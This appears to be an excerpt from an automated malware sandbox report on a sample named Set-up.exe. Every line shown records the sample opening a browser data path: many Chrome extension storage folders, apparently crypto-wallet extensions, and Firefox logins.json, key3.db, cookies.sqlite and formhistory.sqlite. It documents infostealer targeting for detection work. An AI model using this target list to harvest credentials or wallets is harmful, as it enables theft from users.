Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcjginnbdlkdnnahogchmeidnmfckjom	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfcl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliob	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kgdijkcfiglijhaglibaidbipiejjfdp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojhpaddibjnpiefjkbhkfiaedepjheca	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbkfoedolllekgbhcbcoahefnbanhhlh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdfigkbdjmhpdgffnbdbicdmimfikfig	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gafhhkghbfjjkeiendhlofajokpaflmk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\All Users\AppData\Roaming\Mozilla\Firefox\Profiles\Local State	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\llalnijpibhkmpdamakhgmcagghgmjab	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Public\AppData\Roaming\Mozilla\Firefox\Profiles\Local State	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcbigmjiafegjnnogedioegffbooigli	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default\AppData\Roaming\Mozilla\Firefox\Profiles\Local State	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kfdniefadaanbjodldohaedphafoffoh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ckdjpkejmlgmanmmdfeimelghmdfeobe	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibegklajigjlbljkhfpenpfoadebkokl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onapnnfmpjmbmdcipllnjmjdjfonfjdm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\iokeahhehimjnekafflcihljlcjccdbe	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmmkllgcgpldbblpnhghdojehhfafhro	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnkelfanjkeadonecabehalmbgpfodjm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdpelninpfbopdfbppfopcmoepikkgk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cfdldlejlcgbgollnbonjgladpgeogab	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\enabgbdfcbaehmbigakijjabdpdnimlg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ekkhlihjnlmjenikbgmhgjkknoelfped	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilbibkgkmlkhgnpgflcjdfefbkpehoom	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odpnjmimokcmjgojhnhfcnalnegdjmdn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kmhcihpebfmpgmihbkipmjlmmioameka	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ldinpeekobnhjjdofggfgjlcehhmanlj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\apbldaphppcdfbdnnogdikheafliigcf	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnefghmjgbmpkjjfhefnenfnejdjneog	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nebnhfamliijlghikdgcigoebonmoibm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkhmbjifakpikpapdiaepgkdephjgnma	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ablbagjepecncofimgjmdpnhnfjiecfm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnmbobjmhlngoefaiojfljckilhhlhcj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ogphgbfmhodmnmpnaadpbdadldbnmjji	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fpcamiejgfmmhnhbcafmnefbijblinff	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gjhohodkpobnogbepojmopnaninookhj	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egdddjbjlcjckiejbbaneobkpgnmpknp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nofkfblpeailgignhkbnapbephdnmbmn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bopcbmipnjdcdfflfgjdgdjejmgpoaab	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klghhnkeealcohjjanjjdaeeggmfmlpl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nihlebdlccjjdejgocpogfpheakkpodb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jngbikilcgcnfdbmnmnmnleeomffciml	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lnnnmfcpbkafcpgdilckhmhbkkbpkmid	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hjagdglgahihloifacmhaigjnkobnnih	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jfdlamikmbghhapbgfoogdffldioobgl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lfochlioelphaglamdcakfjemolpichk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdgbckgdncnhihllonhnjbdoighgpimk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bifidjkcdpgfnlbcjpdkdcnbiooooblg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijpdbdidkomoophdnnnfoancpbbmpfcn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key3.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\iodngkohgeogpicpibpnaofoeifknfdo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpmkedoipcpimgecpmgpldfpohjplkpp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmglflngjlhgibbmcedpdabjmcmboamo	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ljfpcifpgbbchoddpjefaipoiigpdmag	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ldpmmllpgnfdjkmhcficcifgoeopnodc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\naepdomgkenhinolocfifgehidddafch	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\Local State	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kglcipoddmbniebnibibkghfijekllbl	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mjdmgoiobnbombmnbbdllfncjcmopfnc	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cfhdojbkjhnklbpkdaibdccddilifddb	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\omaabbefbmiijedngplfjmnooppbclkk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\djclckkglechooblngghdinmeemkbgci	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\njojblnpemjkgkchnpbfllpofaphbokk	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\Default User\AppData\Roaming\Mozilla\Firefox\Profiles\Local State	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca	Jump to behavior
